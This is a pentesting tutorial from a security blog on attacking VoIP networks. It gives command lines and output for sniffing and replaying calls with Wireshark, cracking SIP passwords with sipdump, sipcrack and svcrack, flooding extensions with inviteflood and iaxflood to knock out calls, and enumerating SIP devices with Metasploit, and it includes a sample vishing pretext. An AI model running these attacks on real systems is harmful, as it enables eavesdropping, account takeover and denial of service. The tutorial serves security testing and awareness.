CIP Cyber

VoIP Sniffing Cracking Phishing & Metasploit Testing Tutorial

Table of Contents

We have discussed about the VoIP penetration testing and security risk and this is the second part of this series article/tutorial, VoIP and wireless security is an important field to discuss because the security risks are very high so below is the demonstration on VoIP hacking with different tools and operating system that has been used for the demonstration was Linux backtrack 5 r2.

 

Sniffing on VoIP Network

The concept of sniffing in VoIP network is the same as a general
network sniffing concept. I will use some of the most famous tools to
demonstrate the sniffing attack on VoIP network. Let us start with
Wireshark, which is able to capture VoIP traffic.

Now let’s suppose the end users (extensions) are busy
communicating with each other, and that an attacker is trying to
capture some traffic so that he/she will able to get the data (their
communication).


Wireshark has captured some traffic. As discussed above on the
protocol section, RTP contains the information. The question now is:
how do we extract information from these packets? Wireshark provides
the option to extract the information with a built-in feature for
VoIP. Click on the telephony tab – VoIP calls you. You will then
get this window:


Click on the player, then on the decode tab. You are now able to
listen in to this communication and all of the data available in the
audio file.


 

SIP Authentication Cracking (VoIP Cracking)


The importance of password is not a hidden
truth, so in this section I will show you how to crack the password
of any extension (user) on VoIP network. This attack is the most
dangerous, because if an attacker know your password, then he/she
will be able to authenticate on the network by using your identity.

The Wireshark result can be used for
authentication cracking. Save the result into name.pcap; we will now
use a wonderful tool called SIPcrack. It contains two scripts: one,
sipdump, which will allow you to dump the authentication data into
hashes; the second, sipcrack, which will help you to crack the VoIP
password.


01
02
03
04
05
06
07
08
09
10
11
12
13
root@bt:~/Desktop/SIPcrack# ./sipdump
pass.txt -p aa.pcap

SIPdump 0.3pre ( MaJoMu | www.codito.de
)

—————————————

* Using pcap file ‘aa.pcap’ for sniffing

* Starting to sniff with packet filter
‘tcp or udp’

* Dumped login from 192.168.1.9 ->
192.168.1.3 (User: ‘600’)

Exiting, sniffed 1 logins

Sipcrack needs a wordlist to launch an
attack. As a result, it will give you the password.


Another wonderful tool that will help you to
crack the SIP password is svcrack. As with the others, it can be find
under the tool suite of sipvicious. Svcrack is wonderful for brute
force attacks on SIP accounts.


1
2
3
4
5
6
7
root@bt:/pentest/voip/sipvicious#
./svcrack.py -u600 -d list.txt 192.168.1.9

| Extension | Password |

————————

| 600 | 12345 |

Denial of Service Attack on VoIP Network

 


Denial of server (DOS) attack is a dangerous attack that can cause
the VoIP network and devices to crash. Inviteflood is the tool used
to launch DOS attacks against any extensions (user) on the VoIP
network. Usage:

1
2
./inviteflood interface targetuser
targetdomain floodtarget numberofpackets

./inviteflood eth0 600 192.168.1.3
192.168.1.3 200000

It seems to be a “ping of death” attack
and it will crash the end user operating system, disabling the
ability of he/she to make any calls.


Iaxflood is another a good tool that can
flood the IAX2 protocol; the usage is very simple:

1
2
root@bt:/pentest/voip/iaxflood#
./iaxflood

usage: ./iaxflood sourcename
destinationname numpackets

A simple usage like:

01
02
03
04
05
06
07
08
09
10
11
root@bt:/pentest/voip/iaxflood#
./iaxflood 192.168.1.13 192.168.1.2 10000

Will flood port 4569 from port 4569
10000 times

We have IP_HDRINCL

Number of Packets sent:

Sent 10000

root@bt:/pentest/voip/iaxflood#

Metasploit on VoIP Penetration Testing

Metasploit has a different auxiliary module
for VoIP network. Here is the list of some best auxiliary modules of
metasploit for VoIP hacking:

  • auxiliary/scanner/sip/options
    (To find the SIP enable devices)
  • auxiliary/scanner/sip/enumerator (To
    enumerate the extensions)

We can do basic VoIP network penetration
testing by using metasploit auxiliary modules for information
gathering and enumeration. We can scan an entire network to find the
SIP enable devices, plus metasploit auxiliary modules are fast.


01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
msf > use
auxiliary/scanner/sip/options

msf auxiliary(options) > set RHOSTS
192.168.1.1/24

RHOSTS => 192.168.1.1/24

msf auxiliary(options) > run

[*] 192.168.1.3 sip:nobody@192.168.1.3
agent=’WAcjCpW’

[*] 192.168.1.9 200 agent=’Asterisk PBX
1.6.0.26-FONCORE-r78′ verbs=’INVITE, ACK, CANCEL, OPTIONS, BYE,
REFER, SUBSCRIBE, NOTIFY, INFO’

[*] 192.168.1.9 200 agent=’Asterisk PBX
1.6.0.26-FONCORE-r78′ verbs=’INVITE, ACK, CANCEL, OPTIONS, BYE,
REFER, SUBSCRIBE, NOTIFY, INFO’

[*] Scanned 256 of 256 hosts (100%
complete)

[*] Auxiliary module execution completed

msf auxiliary(options) >

VoIP Phishing

Security awareness is very important. Before
concluding this article, I just want to briefly discuss VoIP
phishing. Phishing is not a new attack – it is pretty old school –
but it remains a threat because hackers usually use some social
engineering technique to trick a user before stealing his/her
credential information. You might have heard about email phishing, in
which an attacker directs the victim to a fake page, so that they
will enter their confidential information. In the same fashion, a
hacker can hijack your calls to get your credential information.

Let’s suppose someone received a call or
email like this:

“Hi, this is an urgent email (call) that has been
generated by the network administrator. We have found something wrong
with your account, so please call back at XXXX-XXXX-XXX to verify
your account.” “

Typically, an unwary user will call back;
the hacker may then ask for some confidential information. You need
to understand the risk; educate people around you.




Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
CIP Cyber Staff

CIP Cyber Staff

CIP Cyber Staff comprises CIP cybersecurity experts committed to delivering comprehensive information on critical infrastructure protection. The content covers diverse topics, equipping professionals to defend organizations and communities in an ever-evolving cyber landscape.

Most popular

Industrial Cybersecurity

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Related Articles

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings